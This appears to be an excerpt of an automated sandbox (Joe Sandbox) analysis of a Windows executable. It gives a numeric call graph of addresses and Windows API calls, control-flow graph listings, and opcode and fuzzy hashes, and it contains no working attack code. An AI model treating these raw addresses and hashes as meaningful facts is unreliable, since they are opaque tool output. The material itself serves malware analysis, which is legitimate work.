API calls 94236->94237 94238 7ff73d04c483 94237->94238 94238->93884 94240 7ff73d0489a4 4 API calls 94239->94240 94241 7ff73d047dcb 94240->94241 94335 7ff73d047e14 94241->94335 94243 7ff73d047dd6 94244 7ff73d047deb wcscpy 94243->94244 94245 7ff73d0489fc 4 API calls 94243->94245 94244->93920 94246 7ff73d08c7ab memcpy_s 94245->94246 94248 7ff73d04c09f 94247->94248 94250 7ff73d04c0a5 94247->94250 94248->94250 94388 7ff73d06e0f8 37 API calls 4 library calls 94248->94388 94250->93920 94252 7ff73d0651a8 4 API calls 94251->94252 94253 7ff73d04c1e1 94252->94253 94259 7ff73d04c20c Concurrency::wait 94253->94259 94389 7ff73d06e0f8 37 API calls 4 library calls 94253->94389 94255 7ff73d04c270 94256 7ff73d0982c8 94255->94256 94390 7ff73d06e0f8 37 API calls 4 library calls 94255->94390 94397 7ff73d04bf9c 94256->94397 94258 7ff73d04c28d 94258->94256 94391 7ff73d06e0f8 37 API calls 4 library calls 94258->94391 94259->93920 94262 7ff73d04c2a8 94262->94256 94392 7ff73d06e0f8 37 API calls 4 library calls 94262->94392 94264 7ff73d04c2c3 94264->94256 94265 7ff73d04c2cb 94264->94265 94393 7ff73d06e0f8 37 API calls 4 library calls 94265->94393 94266 7ff73d0982e1 94269 7ff73d09833d Concurrency::wait 94266->94269 94274 7ff73d098310 Concurrency::wait 94266->94274 94268 7ff73d04c2de 94268->94274 94394 7ff73d06e0f8 37 API calls 4 library calls 94268->94394 94401 7ff73d0b8350 78 API calls 3 library calls 94269->94401 94270 7ff73d098323 Concurrency::wait 94404 7ff73d0b8350 78 API calls 3 library calls 94270->94404 94272 7ff73d04c2f9 94272->94274 94395 7ff73d06e0f8 37 API calls 4 library calls 94272->94395 94274->94270 94282 7ff73d04c848 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94274->94282 94285 7ff73d05d2a0 6 API calls 94274->94285 94286 7ff73d04c3e0 147 API calls 94274->94286 94402 7ff73d0618a0 CompareStringW 94274->94402 94403 7ff73d0b85a0 7 API calls 2 library calls 94274->94403 94278 7ff73d098360 94278->94274 94280 7ff73d04c314 94288 7ff73d04c32d 94280->94288 94396 7ff73d06e0f8 37 API calls 4 library calls 94280->94396 94281 7ff73d098487 94282->94274 94284 7ff73d047da0 17 API calls 94284->94288 94285->94274 94286->94274 94287 7ff73d06e0f8 37 API calls 94287->94288 94288->94259 94288->94274 94288->94284 94288->94287 94290 7ff73d04bf11 Concurrency::wait 94289->94290 94291 7ff73d04bf9c 4 API calls 94290->94291 94292 7ff73d04bf42 94291->94292 94292->93920 94294 7ff73d045992 SetCurrentDirectoryW 94293->94294 94295 7ff73d0459a5 FindCloseChangeNotification 94293->94295 94294->93923 94295->94294 94296->93900 94298 7ff73d05cd66 94297->94298 94299 7ff73d05cdc3 SetFilePointerEx SetFilePointerEx 94298->94299 94300 7ff73d0a14ed SetFilePointerEx 94298->94300 94301 7ff73d05cd94 94298->94301 94302 7ff73d0a14e4 94298->94302 94299->94301 94301->93879 94302->94300 94304->93871 94305->93876 94306->93905 94307->93924 94308->93924 94309->93924 94310->93923 94311->93939 94312->93939 94313->93920 94314->93931 94316 7ff73d05cc59 94315->94316 94327 7ff73d05cc44 Concurrency::wait 94315->94327 94317 7ff73d05cd48 3 API calls 94316->94317 94316->94327 94318 7ff73d05cc6d 94317->94318 94319 7ff73d05cc7a 94318->94319 94320 7ff73d0a149c 94318->94320 94321 7ff73d0651a8 4 API calls 94319->94321 94334 7ff73d05c654 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94320->94334 94323 7ff73d05cc87 94321->94323 94329 7ff73d05d050 94323->94329 94326 7ff73d05cd48 3 API calls 94326->94327 94327->94229 94328->94233 94330 7ff73d05d077 94329->94330 94331 7ff73d05d0f9 SetFilePointerEx 94329->94331 94332 7ff73d05cca7 94330->94332 94333 7ff73d05d0be ReadFile 94330->94333 94331->94330 94332->94326 94333->94330 94333->94332 94334->94327 94336 7ff73d047e39 94335->94336 94337 7ff73d08c7de 94335->94337 94339 7ff73d047e49 94336->94339 94340 7ff73d047ed0 94336->94340 94377 7ff73d0bbd4c 9 API calls 94337->94377 94342 7ff73d0651a8 4 API calls 94339->94342 94376 7ff73d04753c 13 API calls Concurrency::wait 94340->94376 94341 7ff73d08c7e6 94345 7ff73d047e5a 94342->94345 94344 7ff73d047e8f Concurrency::wait 94344->94243 94349 7ff73d047ee0 94345->94349 94350 7ff73d047f03 94349->94350 94352 7ff73d0651a8 4 API calls 94350->94352 94366 7ff73d047f0d memcpy_s Concurrency::wait 94350->94366 94351 7ff73d08c826 SetFilePointerEx 94351->94366 94352->94366 94353 7ff73d04808d ReadFile 94353->94366 94354 7ff73d047e7e 94354->94344 94367 7ff73d04b640 MultiByteToWideChar 94354->94367 94355 7ff73d08c958 SetFilePointerEx 94357 7ff73d08c987 ReadFile 94355->94357 94356 7ff73d047fe1 94356->94357 94358 7ff73d048010 94356->94358 94357->94358 94359 7ff73d08c9ac 94357->94359 94358->94354 94363 7ff73d05cd48 3 API calls 94358->94363 94359->94358 94360 7ff73d08c864 94364 7ff73d0651a8 4 API calls 94360->94364 94361 7ff73d08c90e 94361->94355 94362 7ff73d0651a8 4 API calls 94362->94366 94363->94354 94365 7ff73d047fd7 memcpy_s 94364->94365 94365->94355 94365->94356 94365->94361 94366->94351 94366->94353 94366->94354 94366->94360 94366->94361 94366->94362 94366->94365 94368 7ff73d0981b0 94367->94368 94369 7ff73d04b68a 94367->94369 94370 7ff73d0489a4 4 API calls 94368->94370 94371 7ff73d0651a8 4 API calls 94369->94371 94372 7ff73d0981b8 94370->94372 94373 7ff73d04b6a5 MultiByteToWideChar 94371->94373 94378 7ff73d04b6fc 94373->94378 94375 7ff73d04b6d9 Concurrency::wait 94375->94344 94376->94344 94377->94341 94379 7ff73d04b7db 94378->94379 94380 7ff73d04b72e 94378->94380 94381 7ff73d04ba94 4 API calls 94379->94381 94380->94379 94382 7ff73d04b73a 94380->94382 94385 7ff73d04b753 memcpy_s 94381->94385 94383 7ff73d04b78b 94382->94383 94384 7ff73d04b749 Concurrency::wait 94382->94384 94383->94385 94386 7ff73d0651a8 4 API calls 94383->94386 94384->94385 94387 7ff73d0651a8 4 API calls 94384->94387 94385->94375 94386->94385 94387->94385 94388->94250 94389->94255 94390->94258 94391->94262 94392->94264 94393->94268 94394->94272 94395->94280 94396->94288 94398 7ff73d04bfae 94397->94398 94399 7ff73d0651a8 4 API calls 94398->94399 94400 7ff73d04bfcd wcscpy 94399->94400 94400->94266 94401->94278 94402->94274 94403->94274 94404->94281 94406 7ff73d074f1e 94405->94406 94407 7ff73d074f33 94405->94407 94417 7ff73d07b734 15 API calls abort 94406->94417 94416 7ff73d074f2e 94407->94416 94419 7ff73d06e4e4 EnterCriticalSection 94407->94419 94410 7ff73d074f23 94418 7ff73d07b614 31 API calls _invalid_parameter_noinfo 94410->94418 94416->93944 94417->94410 94418->94416 94420 7ff73d09dfa0 94431 7ff73d04bdf8 94420->94431 94422 7ff73d09dfb9 94429 7ff73d09e025 Concurrency::wait 94422->94429 94437 7ff73d0630e0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94422->94437 94424 7ff73d04e630 208 API calls 94426 7ff73d09e063 94424->94426 94430 7ff73d09eb59 Concurrency::wait 94426->94430 94439 7ff73d0c44e8 78 API calls 3 library calls 94426->94439 94427 7ff73d09e006 94427->94426 94438 7ff73d0c2348 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94427->94438 94429->94424 94430->94430 94432 7ff73d04be2e 94431->94432 94433 7ff73d04be13 94431->94433 94435 7ff73d04be1b 94432->94435 94436 7ff73d04c98c 4 API calls 94432->94436 94434 7ff73d04c98c 4 API calls 94433->94434 94434->94435 94435->94422 94436->94435 94437->94427 94439->94430 94440 7ff73d08a622 94441 7ff73d042af4 94440->94441 94442 7ff73d08a62e 94440->94442 94466 7ff73d042b68 7 API calls 94441->94466 94444 7ff73d05d3a0 6 API calls 94442->94444 94446 7ff73d08a638 94444->94446 94448 7ff73d04c848 4 API calls 94446->94448 94450 7ff73d08a649 94448->94450 94449 7ff73d042afe 94451 7ff73d042b13 94449->94451 94454 7ff73d043370 57 API calls 94449->94454 94452 7ff73d08a652 94450->94452 94461 7ff73d08a66f 94450->94461 94458 7ff73d042b37 94451->94458 94462 7ff73d042e98 Shell_NotifyIconW 94451->94462 94453 7ff73d045624 4 API calls 94452->94453 94455 7ff73d08a65e 94453->94455 94454->94451 94457 7ff73d045e74 4 API calls 94455->94457 94456 7ff73d045624 4 API calls 94459 7ff73d08a685 GetForegroundWindow ShellExecuteW 94456->94459 94457->94461 94470 7ff73d0437d4 94458->94470 94463 7ff73d08a6c1 Concurrency::wait 94459->94463 94461->94456 94462->94458 94463->94458 94464 7ff73d042b43 SetCurrentDirectoryW 94465 7ff73d042b58 Concurrency::wait 94464->94465 94474 7ff73d042d74 7 API calls 94466->94474 94468 7ff73d042af9 94469 7ff73d042ca0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94468->94469 94471 7ff73d0437ef Concurrency::wait 94470->94471 94472 7ff73d043831 Concurrency::wait 94471->94472 94475 7ff73d043910 94471->94475 94472->94464 94474->94468 94476 7ff73d043930 94475->94476 94479 7ff73d08abec Concurrency::wait 94475->94479 94477 7ff73d047af4 15 API calls 94476->94477 94478 7ff73d043948 94477->94478 94478->94472 94480 7ff73d09ef61 94481 7ff73d09ef6b 94480->94481 94483 7ff73d0651a8 4 API calls 94481->94483 94485 7ff73d09ef84 memcpy_s 94481->94485 94482 7ff73d0651a8 4 API calls 94484 7ff73d09efb1 94482->94484 94483->94485 94485->94482 94608 7ff73d06953c 94609 7ff73d0695ac 94608->94609 94610 7ff73d069562 GetModuleHandleW 94608->94610 94625 7ff73d07bf4c EnterCriticalSection 94609->94625 94610->94609 94616 7ff73d06956f 94610->94616 94612 7ff73d06965b 94613 7ff73d07bfa0 _isindst LeaveCriticalSection 94612->94613 94615 7ff73d069680 94613->94615 94614 7ff73d069630 94617 7ff73d069648 94614->94617 94621 7ff73d07b254 74 API calls 94614->94621 94618 7ff73d06968c 94615->94618 94623 7ff73d0696a8 11 API calls 94615->94623 94616->94609 94626 7ff73d0696f4 GetModuleHandleExW 94616->94626 94622 7ff73d07b254 74 API calls 94617->94622 94619 7ff73d07af3c 33 API calls 94619->94614 94621->94617 94622->94612 94623->94618 94624 7ff73d0695b6 94624->94612 94624->94614 94624->94619 94627 7ff73d06971e GetProcAddress 94626->94627 94628 7ff73d069745 94626->94628 94627->94628 94629 7ff73d069738 94627->94629 94630 7ff73d069755 94628->94630 94631 7ff73d06974f FreeLibrary 94628->94631 94629->94628 94630->94609 94631->94630 94632 7ff73d041a3d SystemParametersInfoW 94633 7ff73d042efc 94634 7ff73d042f04 94633->94634 94635 7ff73d042fa8 94634->94635 94636 7ff73d042f38 94634->94636 94661 7ff73d042fa6 94634->94661 94640 7ff73d042fae 94635->94640 94641 7ff73d08a739 94635->94641 94637 7ff73d043031 PostQuitMessage 94636->94637 94638 7ff73d042f45 94636->94638 94671 7ff73d042f8c 94637->94671 94642 7ff73d08a7bf 94638->94642 94643 7ff73d042f50 94638->94643 94639 7ff73d042f7b DefWindowProcW 94639->94671 94645 7ff73d042fdc SetTimer RegisterWindowMessageW 94640->94645 94646 7ff73d042fb5 94640->94646 94685 7ff73d043de0 8 API calls 94641->94685 94687 7ff73d0bb0e4 62 API calls fread_s 94642->94687 94647 7ff73d042f59 94643->94647 94648 7ff73d04303b 94643->94648 94649 7ff73d04300c CreatePopupMenu 94645->94649 94645->94671 94652 7ff73d042fbe KillTimer 94646->94652 94653 7ff73d08a6c8 94646->94653 94647->94661 94662 7ff73d04301b 94647->94662 94663 7ff73d042f6f 94647->94663 94675 7ff73d041140 94648->94675 94649->94671 94651 7ff73d08a765 94686 7ff73d0632fc 46 API calls Concurrency::wait 94651->94686 94654 7ff73d042e98 Shell_NotifyIconW 94652->94654 94658 7ff73d08a707 MoveWindow 94653->94658 94659 7ff73d08a6cd 94653->94659 94660 7ff73d042fd3 94654->94660 94655 7ff73d08a7d3 94655->94639 94655->94671 94658->94671 94664 7ff73d08a6d2 94659->94664 94665 7ff73d08a6f4 SetFocus 94659->94665 94682 7ff73d0444a4 DeleteObject DestroyWindow Concurrency::wait 94660->94682 94661->94639 94683 7ff73d04304c 72 API calls fread_s 94662->94683 94663->94639 94672 7ff73d042e98 Shell_NotifyIconW 94663->94672 94664->94663 94666 7ff73d08a6db 94664->94666 94665->94671 94684 7ff73d043de0 8 API calls 94666->94684 94670 7ff73d04302f 94670->94671 94673 7ff73d08a790 94672->94673 94674 7ff73d043370 57 API calls 94673->94674 94674->94661 94676 7ff73d04114a fread_s 94675->94676 94677 7ff73d04120b 94675->94677 94678 7ff73d044620 52 API calls 94676->94678 94677->94671 94680 7ff73d041190 94678->94680 94679 7ff73d0411d2 KillTimer SetTimer 94679->94677 94680->94679 94681 7ff73d089ea1 Shell_NotifyIconW 94680->94681 94681->94679 94682->94671 94683->94670 94684->94671 94685->94651 94686->94663 94687->94655 94486 7ff73d081764 94487 7ff73d08178d 94486->94487 94488 7ff73d0817a5 94486->94488 94511 7ff73d07b714 15 API calls abort 94487->94511 94490 7ff73d081820 94488->94490 94493 7ff73d0817d8 94488->94493 94513 7ff73d07b714 15 API calls abort 94490->94513 94491 7ff73d081792 94512 7ff73d07b734 15 API calls abort 94491->94512 94510 7ff73d07e8a0 EnterCriticalSection 94493->94510 94494 7ff73d081825 94514 7ff73d07b734 15 API calls abort 94494->94514 94498 7ff73d0817df 94500 7ff73d081804 94498->94500 94501 7ff73d0817ef 94498->94501 94499 7ff73d08182d 94515 7ff73d07b614 31 API calls _invalid_parameter_noinfo 94499->94515 94505 7ff73d081854 33 API calls 94500->94505 94504 7ff73d07b734 fread_s 15 API calls 94501->94504 94503 7ff73d08179a 94506 7ff73d0817f4 94504->94506 94507 7ff73d0817ff 94505->94507 94508 7ff73d07b714 fread_s 15 API calls 94506->94508 94509 7ff73d07e984 fwprintf LeaveCriticalSection 94507->94509 94508->94507 94509->94503 94511->94491 94512->94503 94513->94494 94514->94499 94515->94503 94688 7ff73d09c93b 94689 7ff73d09c949 94688->94689 94699 7ff73d050650 Concurrency::wait 94688->94699 94689->94689 94690 7ff73d050998 PeekMessageW 94690->94699 94691 7ff73d0506aa GetInputState 94691->94690 94691->94699 94693 7ff73d09b7fb TranslateAcceleratorW 94693->94699 94694 7ff73d050a03 PeekMessageW 94694->94699 94695 7ff73d0509ef TranslateMessage DispatchMessageA 94695->94694 94696 7ff73d050889 timeGetTime 94696->94699 94697 7ff73d09b935 timeGetTime 94768 7ff73d0630e0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94697->94768 94699->94690 94699->94691 94699->94693 94699->94694 94699->94695 94699->94696 94699->94697 94703 7ff73d054840 208 API calls 94699->94703 94704 7ff73d04e630 208 API calls 94699->94704 94705 7ff73d050826 Concurrency::wait 94699->94705 94706 7ff73d051c90 208 API calls 94699->94706 94707 7ff73d0c44e8 78 API calls 94699->94707 94709 7ff73d050b40 94699->94709 94716 7ff73d050e00 94699->94716 94763 7ff73d063fb4 94699->94763 94769 7ff73d0c4a8c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94699->94769 94770 7ff73d0db44c 208 API calls Concurrency::wait 94699->94770 94703->94699 94704->94699 94706->94699 94707->94699 94710 7ff73d050b79 94709->94710 94711 7ff73d050b66 94709->94711 94791 7ff73d0c44e8 78 API calls 3 library calls 94710->94791 94771 7ff73d050020 94711->94771 94713 7ff73d050b6e 94713->94699 94715 7ff73d09cc32 94762 7ff73d050e60 memcpy_s Concurrency::wait 94716->94762 94717 7ff73d06565c EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94717->94762 94718 7ff73d0c44e8 78 API calls 94718->94762 94719 7ff73d0472b8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94719->94762 94721 7ff73d065454 34 API calls __scrt_initialize_thread_safe_statics 94721->94762 94722 7ff73d04d100 45 API calls 94722->94762 94723 7ff73d0655fc EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 94723->94762 94724 7ff73d09d8da 94728 7ff73d09d905 94724->94728 94732 7ff73d09d918 94724->94732 94760 7ff73d0512d7 Concurrency::wait 94724->94760 94795 7ff73d0c1798 94724->94795 94727 7ff73d09d93e 94821 7ff73d05f2e0 36 API calls 94728->94821 94730 7ff73d051c90 208 API calls 94730->94762 94822 7ff73d05f340 36 API calls 94732->94822 94734 7ff73d09d3df 94734->94699 94735 7ff73d09d525 94816 7ff73d0c44e8 78 API calls 3 library calls 94735->94816 94737 7ff73d09d07c 94813 7ff73d0c44e8 78 API calls 3 library calls 94737->94813 94740 7ff73d05166a 94740->94734 94740->94735 94742 7ff73d051c90 208 API calls 94740->94742 94746 7ff73d051762 94740->94746 94751 7ff73d09d542 Concurrency::wait 94740->94751 94759 7ff73d0517c8 Concurrency::wait 94740->94759 94742->94740 94743 7ff73d0651a8 4 API calls 94743->94762 94744 7ff73d09cfe3 94810 7ff73d0d8b04 208 API calls Concurrency::wait 94744->94810 94746->94759 94807 7ff73d0537f0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94746->94807 94748 7ff73d09d099 Concurrency::wait 94748->94760 94814 7ff73d0c44e8 78 API calls 3 library calls 94748->94814 94749 7ff73d09d204 Concurrency::wait 94749->94760 94815 7ff73d0c44e8 78 API calls 3 library calls 94749->94815 94751->94760 94817 7ff73d0c44e8 78 API calls 3 library calls 94751->94817 94752 7ff73d09d006 94752->94760 94811 7ff73d0c44e8 78 API calls 3 library calls 94752->94811 94756 7ff73d09d888 94819 7ff73d0c44e8 78 API calls 3 library calls 94756->94819 94758 7ff73d09d89a 94820 7ff73d0c44e8 78 API calls 3 library calls 94758->94820 94759->94760 94818 7ff73d0c44e8 78 API calls 3 library calls 94759->94818 94760->94699 94762->94717 94762->94718 94762->94719 94762->94721 94762->94722 94762->94723 94762->94724 94762->94730 94762->94737 94762->94740 94762->94743 94762->94744 94762->94748 94762->94749 94762->94756 94762->94758 94762->94760 94806 7ff73d0537f0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94762->94806 94808 7ff73d04e030 36 API calls wcsstr 94762->94808 94809 7ff73d045aac 208 API calls 94762->94809 94812 7ff73d0db44c 208 API calls Concurrency::wait 94762->94812 94764 7ff73d063fd9 94763->94764 94766 7ff73d063ff6 94763->94766 94764->94699 94765 7ff73d064027 IsDialogMessageW 94765->94764 94765->94766 94766->94764 94766->94765 94767 7ff73d0ab2b2 GetClassLongPtrW 94766->94767 94767->94765 94767->94766 94768->94699 94769->94699 94770->94699 94772 7ff73d051c90 208 API calls 94771->94772 94783 7ff73d050078 94772->94783 94773 7ff73d0500fd Concurrency::wait 94773->94713 94774 7ff73d09b6e9 94794 7ff73d0c44e8 78 API calls 3 library calls 94774->94794 94776 7ff73d09b707 94777 7ff73d050522 94778 7ff73d0651a8 4 API calls 94777->94778 94788 7ff73d05039b memcpy_s Concurrency::wait 94778->94788 94779 7ff73d09b6b0 94780 7ff73d04c98c 4 API calls 94779->94780 94782 7ff73d09b6dc 94780->94782 94781 7ff73d0651a8 4 API calls 94787 7ff73d050275 memcpy_s Concurrency::wait 94781->94787 94785 7ff73d04c98c 4 API calls 94782->94785 94783->94773 94783->94774 94783->94777 94784 7ff73d050214 94783->94784 94783->94787 94783->94788 94784->94788 94792 7ff73d04fd00 208 API calls 94784->94792 94785->94774 94787->94781 94787->94788 94788->94779 94789 7ff73d0c44e8 78 API calls 94788->94789 94793 7ff73d041dc0 208 API calls 94788->94793 94789->94788 94791->94715 94792->94787 94793->94788 94794->94776 94796 7ff73d0c17d7 94795->94796 94800 7ff73d0c17af 94795->94800 94796->94728 94797 7ff73d0c17d9 94824 7ff73d064c00 49 API calls 94797->94824 94798 7ff73d0c17de 94801 7ff73d04b1c0 49 API calls 94798->94801 94800->94796 94800->94797 94800->94798 94804 7ff73d0c17d2 94800->94804 94802 7ff73d0c17e6 94801->94802 94803 7ff73d045e74 4 API calls 94802->94803 94803->94796 94823 7ff73d04e030 36 API calls wcsstr 94804->94823 94806->94762 94807->94759 94808->94762 94809->94762 94810->94752 94811->94760 94812->94762 94813->94748 94814->94749 94815->94760 94816->94751 94817->94759 94818->94760 94819->94758 94820->94724 94821->94732 94822->94727 94823->94796 94824->94798

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                      • API String ID: 2649000838-1173974218
                                                                                                                                                                      • Opcode ID: d4fee068a2ce70684d64e1ee363191ecc88e9671b979ab68bca7b2bea32beed7
                                                                                                                                                                      • Instruction ID: 75e7d25fbc0be1580a1f7a35c7dba18bc4e19000ef6f46b90811ff2d3d0b6d54
                                                                                                                                                                      • Opcode Fuzzy Hash: d4fee068a2ce70684d64e1ee363191ecc88e9671b979ab68bca7b2bea32beed7
                                                                                                                                                                      • Instruction Fuzzy Hash: BF41A622A2CA46A1EA10FBA0E4446EDA360FF94F54FD01131FA5E43695EF7CE505DB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1238 7ff73d061d7c-7ff73d061e13 call 7ff73d0472b8 GetVersionExW call 7ff73d045f44 1243 7ff73d0a9a40 1238->1243 1244 7ff73d061e19 1238->1244 1245 7ff73d0a9a47-7ff73d0a9a4d 1243->1245 1246 7ff73d061e1c-7ff73d061e42 call 7ff73d04ba94 1244->1246 1247 7ff73d0a9a53-7ff73d0a9a70 1245->1247 1252 7ff73d061e48 1246->1252 1253 7ff73d061fc1 1246->1253 1247->1247 1249 7ff73d0a9a72-7ff73d0a9a75 1247->1249 1249->1246 1251 7ff73d0a9a7b-7ff73d0a9a81 1249->1251 1251->1245 1254 7ff73d0a9a83 1251->1254 1255 7ff73d061e4f-7ff73d061e55 1252->1255 1253->1243 1257 7ff73d0a9a88-7ff73d0a9a91 1254->1257 1256 7ff73d061e5b-7ff73d061e78 1255->1256 1256->1256 1258 7ff73d061e7a-7ff73d061e7d 1256->1258 1257->1255 1260 7ff73d0a9a97 1257->1260 1258->1257 1259 7ff73d061e83-7ff73d061ecc call 7ff73d04ba94 1258->1259 1263 7ff73d0a9bf0-7ff73d0a9bf8 1259->1263 1264 7ff73d061ed2-7ff73d061ed4 1259->1264 1260->1253 1267 7ff73d0a9c05-7ff73d0a9c08 1263->1267 1268 7ff73d0a9bfa-7ff73d0a9c03 1263->1268 1265 7ff73d0a9ad0-7ff73d0a9ae6 1264->1265 1266 7ff73d061eda-7ff73d061edd 1264->1266 1271 7ff73d0a9b14-7ff73d0a9b16 1265->1271 1272 7ff73d0a9ae8-7ff73d0a9aef 1265->1272 1269 7ff73d061f3c-7ff73d061f80 GetCurrentProcess IsWow64Process call 7ff73d0667d0 1266->1269 1270 7ff73d061edf-7ff73d061f24 1266->1270 1273 7ff73d0a9c31-7ff73d0a9c3d 1267->1273 1274 7ff73d0a9c0a-7ff73d0a9c1f 1267->1274 1268->1273 1285 7ff73d0a9c48-7ff73d0a9c5e call 7ff73d0b3f7c 1269->1285 1297 7ff73d061f86-7ff73d061f8b GetSystemInfo 1269->1297 1270->1269 1277 7ff73d061f26-7ff73d061f2d 1270->1277 1275 7ff73d0a9b52-7ff73d0a9b55 1271->1275 1276 7ff73d0a9b18-7ff73d0a9b2d 1271->1276 1279 7ff73d0a9af1-7ff73d0a9afa 1272->1279 1280 7ff73d0a9aff-7ff73d0a9b0f 1272->1280 1273->1285 1281 7ff73d0a9c21-7ff73d0a9c28 1274->1281 1282 7ff73d0a9c2a 1274->1282 1286 7ff73d0a9b57-7ff73d0a9b73 1275->1286 1287 7ff73d0a9b98-7ff73d0a9b9b 1275->1287 1283 7ff73d0a9b2f-7ff73d0a9b38 1276->1283 1284 7ff73d0a9b3d-7ff73d0a9b4d 1276->1284 1288 7ff73d061f33 1277->1288 1289 7ff73d0a9a9c-7ff73d0a9aa4 1277->1289 1279->1269 1280->1269 1281->1273 1282->1273 1283->1269 1284->1269 1302 7ff73d0a9c82-7ff73d0a9c87 GetSystemInfo 1285->1302 1303 7ff73d0a9c60-7ff73d0a9c80 call 7ff73d0b3f7c 1285->1303 1292 7ff73d0a9b75-7ff73d0a9b7e 1286->1292 1293 7ff73d0a9b83-7ff73d0a9b93 1286->1293 1287->1269 1294 7ff73d0a9ba1-7ff73d0a9bcb 1287->1294 1288->1269 1295 7ff73d0a9aa6-7ff73d0a9ab6 1289->1295 1296 7ff73d0a9abb-7ff73d0a9acb 1289->1296 1292->1269 1293->1269 1299 7ff73d0a9bcd-7ff73d0a9bd6 1294->1299 1300 7ff73d0a9bdb-7ff73d0a9beb 1294->1300 1295->1269 1296->1269 1301 7ff73d061f91-7ff73d061fc0 1297->1301 1299->1269 1300->1269 1305 7ff73d0a9c8d-7ff73d0a9c95 1302->1305 1303->1305 1305->1301 1307 7ff73d0a9c9b-7ff73d0a9ca2 FreeLibrary 1305->1307 1307->1301
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1568231622-0
                                                                                                                                                                      • Opcode ID: 99d212105d47f654f549046e31736f8ef43866d6f1065e89d7b8d8f607d867c4
                                                                                                                                                                      • Instruction ID: 4d73577f75a82067f7e4417d0b41fa08a6e0e87736d92e48b1b5b59f477867eb
                                                                                                                                                                      • Opcode Fuzzy Hash: 99d212105d47f654f549046e31736f8ef43866d6f1065e89d7b8d8f607d867c4
                                                                                                                                                                      • Instruction Fuzzy Hash: CBD1A751B5D68BE6E760ABE1B8001B5B750AF11B80FC64035D48D0366AFFADE189F372
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                      • String ID: Variable must be of type 'Object'.
                                                                                                                                                                      • API String ID: 1385522511-109567571
